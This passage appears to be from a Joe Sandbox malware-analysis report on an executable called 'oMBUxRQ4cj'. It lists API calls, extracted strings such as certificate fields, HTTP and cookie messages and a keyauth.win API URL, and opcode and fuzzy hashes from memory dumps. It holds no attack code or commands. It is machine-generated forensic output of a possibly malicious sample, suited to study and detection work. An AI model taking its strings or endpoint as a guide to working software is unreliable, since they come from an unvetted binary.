                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF7E5A0299B), ref: 00007FF7E5A02168
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: calloc
                                            • String ID:
                                            • API String ID: 2635317215-0
                                            • Opcode ID: c13eb664660336fd0cc8a44c18222f56f9417570d696fd593da57c98a09dd568
                                            • Instruction ID: 702ce65c55dddf08c52a50dc5ce7811b2fe1a2014d7569582e37ddb4be831abd
                                            • Opcode Fuzzy Hash: c13eb664660336fd0cc8a44c18222f56f9417570d696fd593da57c98a09dd568
                                            • Instruction Fuzzy Hash: A3919C22609BC189E7459F34D4507AD7BA1FB59B28F480236CFAC4B3D6DF3991A4C722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$mallocmemcpy
                                            • String ID: Start Date: %s$Start Date
                                            • API String ID: 3401966785-2389359183
                                            • Opcode ID: 320c2bfa95c58a3e1609ac9c22957941cfe5e410ed8167142616c93d932a3e4d
                                            • Instruction ID: 95988ab8e7b239577b6f9cdc3cd5fd305c239129ccf67a5f2a87a98a7f201176
                                            • Opcode Fuzzy Hash: 320c2bfa95c58a3e1609ac9c22957941cfe5e410ed8167142616c93d932a3e4d
                                            • Instruction Fuzzy Hash: B8413951B092CA46EF1D66218034B7DAF82AF05F98F844637CA1F877C5DE3CE2458322
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                            • String ID:
                                            • API String ID: 1775671525-0
                                            • Opcode ID: 56b14bdc5f89045d4f7b2da786287d42a27f2024155c1ece33cbbf5de22e5f5c
                                            • Instruction ID: e4229c3a1b66cd53fbac925da9d4044883ec9540ed1c269aca4caab1767d37d8
                                            • Opcode Fuzzy Hash: 56b14bdc5f89045d4f7b2da786287d42a27f2024155c1ece33cbbf5de22e5f5c
                                            • Instruction Fuzzy Hash: 8B31AE6271974A85EE14AB16A5142E9A295BF08FE0F980633DFAD877D5CF3CE0418221
                                            APIs
                                            • memcpy.VCRUNTIME140(?,?,00000000,?,?,0000000F,00007FF7E59E3C25,?,?,?,?,?,00007FF7E59E1D8B), ref: 00007FF7E59E4FA3
                                            • memcpy.VCRUNTIME140(?,?,00000000,?,?,0000000F,00007FF7E59E3C25,?,?,?,?,?,00007FF7E59E1D8B), ref: 00007FF7E59E4FB1
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,0000000F,00007FF7E59E3C25,?,?,?,?,?,00007FF7E59E1D8B), ref: 00007FF7E59E4FEA
                                            • memcpy.VCRUNTIME140(?,?,00000000,?,?,0000000F,00007FF7E59E3C25,?,?,?,?,?,00007FF7E59E1D8B), ref: 00007FF7E59E4FF4
                                            • memcpy.VCRUNTIME140(?,?,00000000,?,?,0000000F,00007FF7E59E3C25,?,?,?,?,?,00007FF7E59E1D8B), ref: 00007FF7E59E5002
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E59E5031
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                            • String ID:
                                            • API String ID: 1775671525-0
                                            • Opcode ID: a0251d31b2e56c634ffd3971ee331e0c2d19140fef6248804dc9cc2118053b84
                                            • Instruction ID: 00ca7a2507ae1de3e95cc1df17c998b4cbca7d4aa401dd767ac696386aa9b13a
                                            • Opcode Fuzzy Hash: a0251d31b2e56c634ffd3971ee331e0c2d19140fef6248804dc9cc2118053b84
                                            • Instruction Fuzzy Hash: 1041D32171964985EA14AB16A5243ADE791BF08FE4F940A32DF6D8BBD5CF3CE0418311
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ConditionMask$InfoVerifyVersion
                                            • String ID:
                                            • API String ID: 2793162063-0
                                            • Opcode ID: b6c6db3b816de679375f91f2878e76babe7d6183a69cc8df1fcf61702d0bf89d
                                            • Instruction ID: 4b240f9eb88e15eaa80b91a6bf0513a28c7744944e17f5d2bc8d93196f9e06cb
                                            • Opcode Fuzzy Hash: b6c6db3b816de679375f91f2878e76babe7d6183a69cc8df1fcf61702d0bf89d
                                            • Instruction Fuzzy Hash: 5641FB22F2C68686F6309B21A424BBAEB90EFD5B44F405236D5C942B54DF7DE4848B11
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Expire Date: %s$ Public Key Algorithm: %s$Expire Date$Public Key Algorithm
                                            • API String ID: 1294909896-2901970132
                                            • Opcode ID: a7dcf3b872bca8685f5961ceb99f1390aa710949134b2c2dcb5dcad2218fd221
                                            • Instruction ID: 1b262a1cc97b0a59dc5dcd86e598571df4de6bcd59765d6593b40afac92902ee
                                            • Opcode Fuzzy Hash: a7dcf3b872bca8685f5961ceb99f1390aa710949134b2c2dcb5dcad2218fd221
                                            • Instruction Fuzzy Hash: DD418565B0978644EB10AB61D4646FDABA1BF05F9CF884533CE5E87786DF3CD2448322
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupstrchr$mallocstrncpy
                                            • String ID:
                                            • API String ID: 2121287944-0
                                            • Opcode ID: 701b562d305d28b033affdddbf65d7e14a7e199027673d6d929ac0e14e4089d7
                                            • Instruction ID: 4e4a27657094450ca7cffb0d0af97f6a3261d0ad253ea9aed991926a14979407
                                            • Opcode Fuzzy Hash: 701b562d305d28b033affdddbf65d7e14a7e199027673d6d929ac0e14e4089d7
                                            • Instruction Fuzzy Hash: CB31EA21B09B8686EA54FF12A46077DBB91EF85F84F445636DE4E43784DF3CE0409311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcpy$freemalloc
                                            • String ID: PLAIN
                                            • API String ID: 3313557100-4000620671
                                            • Opcode ID: 8f06fc03e41532ca5b0a05e7a0119cb7575dcb3cf368c3afc8c923dc2a594b74
                                            • Instruction ID: c683cd10bd78db5ca7f490468c13be3f96ae4461f0b2abe2f4f02d69a9ef4b45
                                            • Opcode Fuzzy Hash: 8f06fc03e41532ca5b0a05e7a0119cb7575dcb3cf368c3afc8c923dc2a594b74
                                            • Instruction Fuzzy Hash: 6731D366B08B8982EB109F15E45076AEB90FF45FE8F848632DE9D87795EE3CD045C311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Serial Number: %s$ Signature Algorithm: %s$Serial Number$Signature Algorithm
                                            • API String ID: 1294909896-517259162
                                            • Opcode ID: 2fd35b2195533c0d331094ca4293c55f542b21112d758763103316afcab7a770
                                            • Instruction ID: d1493f48c08e04b6e3159268ff928b8e9bec946ea995d8f753e81bb69beabfcd
                                            • Opcode Fuzzy Hash: 2fd35b2195533c0d331094ca4293c55f542b21112d758763103316afcab7a770
                                            • Instruction Fuzzy Hash: 6A417362B0978644EB11AB61D464AFDABA1BF05FCCF884437DE0E97756DF38E1448322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Expire Date: %s$ Public Key Algorithm: %s$Expire Date$Public Key Algorithm
                                            • API String ID: 1294909896-2901970132
                                            • Opcode ID: b659deefd899a68d928ef1cf79296cef25cdd2965dd7581ad9d560776997bfc4
                                            • Instruction ID: 6be161246b7ab7b1d667b2afd2fdf5be99c9b2f96bc08cb6984e817a660b6f33
                                            • Opcode Fuzzy Hash: b659deefd899a68d928ef1cf79296cef25cdd2965dd7581ad9d560776997bfc4
                                            • Instruction Fuzzy Hash: 3E315451B0978A45EB11AB619464AFDABA1BF05F8CFC40837CE4E87346DF3CE1448322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemalloc
                                            • String ID: Expire Date: %s$ Public Key Algorithm: %s$Expire Date$Public Key Algorithm
                                            • API String ID: 3061335427-2901970132
                                            • Opcode ID: e0429e70490afcf1625c8906fbbcc74cc03aec47c80e042e40f4a1758fe81c31
                                            • Instruction ID: 1c86a73eb350f16c6d9a32cdb2ccda82877fefc8ddc809e6edbf763f6162d099
                                            • Opcode Fuzzy Hash: e0429e70490afcf1625c8906fbbcc74cc03aec47c80e042e40f4a1758fe81c31
                                            • Instruction Fuzzy Hash: 14313561B0978A45EB11AB61D464AFDABA1BF05B8CFC40837CE4D97356DF3CE5448322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemalloc
                                            • String ID: Expire Date: %s$ Public Key Algorithm: %s$Expire Date$Public Key Algorithm
                                            • API String ID: 3061335427-2901970132
                                            • Opcode ID: 5a34c979c22d99fa642846dc252d67e8bd6e08a4038edfdd442936c0c994fb53
                                            • Instruction ID: 00cf4747d6257c3e9ea6c1be9f2c2705aab575f15b8d8aadd77758b5931acb21
                                            • Opcode Fuzzy Hash: 5a34c979c22d99fa642846dc252d67e8bd6e08a4038edfdd442936c0c994fb53
                                            • Instruction Fuzzy Hash: B6315361B0978A44EB11AB61D464AFDABA1BF05B8CFC40837CE4E97356DF3CE1448322
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: CriticalSectionfree$CloseEnterHandleLeaveclosesocket
                                            • String ID:
                                            • API String ID: 469868127-0
                                            • Opcode ID: 024514fa3772a8c69e18930f2edb36f8a4a7b61728b80ad75d0dc27bfabe14dc
                                            • Instruction ID: 2034ede8176f4e60b07fc2e70dea1287efd2507bc2b7debf4aa773c028765265
                                            • Opcode Fuzzy Hash: 024514fa3772a8c69e18930f2edb36f8a4a7b61728b80ad75d0dc27bfabe14dc
                                            • Instruction Fuzzy Hash: 1C213E36708A4986E620AF52E560379B770FF49F90F844032CF8E83B54DF39E4A58721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _errno_strdup
                                            • String ID: %s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced
                                            • API String ID: 2151398962-2292467869
                                            • Opcode ID: 82631bb3135a2ad10e17f086c294e470c804b6d2ccea4246878ff724b50622f8
                                            • Instruction ID: 5bc933ceb32def50c3adf7ae94a1db03c03b95804644f202ff05813008eadcfb
                                            • Opcode Fuzzy Hash: 82631bb3135a2ad10e17f086c294e470c804b6d2ccea4246878ff724b50622f8
                                            • Instruction Fuzzy Hash: C3617161A0979A45FF71AB2590643FAA792EF54F44F880033DB8D82691DF3CE494C372
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupstrchr
                                            • String ID: %s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced
                                            • API String ID: 3727083984-2292467869
                                            • Opcode ID: c2ab3cbf1cffc3fc9e4ce8172e99c2bf4d11b967c886fdd51e25c4ea2097fbec
                                            • Instruction ID: a9018ed970caaee9f4a140f3effefaba60d50e13828b558c9af8a15ff8388c7b
                                            • Opcode Fuzzy Hash: c2ab3cbf1cffc3fc9e4ce8172e99c2bf4d11b967c886fdd51e25c4ea2097fbec
                                            • Instruction Fuzzy Hash: 44618121A0978A45FF71AB2590643FAA7A2EF54F54F880037DB8D82691DF3CE4948372
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfree
                                            • String ID: Forcing HTTP/1.1 for NTLM$The requested URL returned error: %d
                                            • API String ID: 1865132094-1204028548
                                            • Opcode ID: 0e0eaa027d3d22a4a8d4ec68c5691ab6803c475b566300ff1cb4639a436c852e
                                            • Instruction ID: 39b70d8ee6f7d4e788f2a0af86a87a03d2a7a86fff0efd746e78eb1cf7aee9ca
                                            • Opcode Fuzzy Hash: 0e0eaa027d3d22a4a8d4ec68c5691ab6803c475b566300ff1cb4639a436c852e
                                            • Instruction Fuzzy Hash: 4651ACB1B0C6C641FB64AA259260BBDAF92EF45F44F880036DA4DCB685DF3CE4508732
                                            APIs
                                              • Part of subcall function 00007FF7E59E4310: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E59E4341
                                              • Part of subcall function 00007FF7E59E3C30: memcpy.VCRUNTIME140 ref: 00007FF7E59E3C83
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E26E2
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2730
                                            • __std_exception_copy.VCRUNTIME140 ref: 00007FF7E59E2780
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E27CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo_noreturn$memcpy$__std_exception_copy
                                            • String ID: out_of_range
                                            • API String ID: 2484256320-3053435996
                                            • Opcode ID: 011e101c21e85212f65616117e2b30cad61de5ca062f2b3863d0ff6025111508
                                            • Instruction ID: 3794cb003afeb07502e65000160f53790b31aa38696a2087bd17cf94fff63f4d
                                            • Opcode Fuzzy Hash: 011e101c21e85212f65616117e2b30cad61de5ca062f2b3863d0ff6025111508
                                            • Instruction Fuzzy Hash: 38518032B18B4599FB00EF64E4603EC7765EB45BA8F805232DA5D82AD5DF38E195C311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _errno_strdupstrcspnstrncmpstrspn
                                            • String ID: 0123456789abcdefABCDEF:.
                                            • API String ID: 2191890455-446397347
                                            • Opcode ID: 843ade515a0bd07329736349e60a03f950eedd840701748e77495a0b5ca17848
                                            • Instruction ID: 995cd0db40b8316e8ba2237434a2ef8886b6dc40febed559fd63b3136012f440
                                            • Opcode Fuzzy Hash: 843ade515a0bd07329736349e60a03f950eedd840701748e77495a0b5ca17848
                                            • Instruction Fuzzy Hash: 7D41C316B0CACE45EB21AB149822B79AF91EF06F54FC44133CA8D97A85DF3CD445C722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: isupper$free
                                            • String ID: %u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$GMT
                                            • API String ID: 573759493-632690687
                                            • Opcode ID: 18548420aa55df9f48917c6983994d8601e4b2c51c1ca09d28ffe1cdaf2f51e4
                                            • Instruction ID: e8518b9d7ee9f14250e41eff0f61a738fd73b338d4cd53189b2c6ed7337ba52e
                                            • Opcode Fuzzy Hash: 18548420aa55df9f48917c6983994d8601e4b2c51c1ca09d28ffe1cdaf2f51e4
                                            • Instruction Fuzzy Hash: 6E419021B0CA8A89F7219F649160BBDEF91AF45F88FD80132C68E82695DF3CD545C322
                                            APIs
                                            • memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E59E4341
                                            • memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E59E4406
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E59E445A
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E59E4461
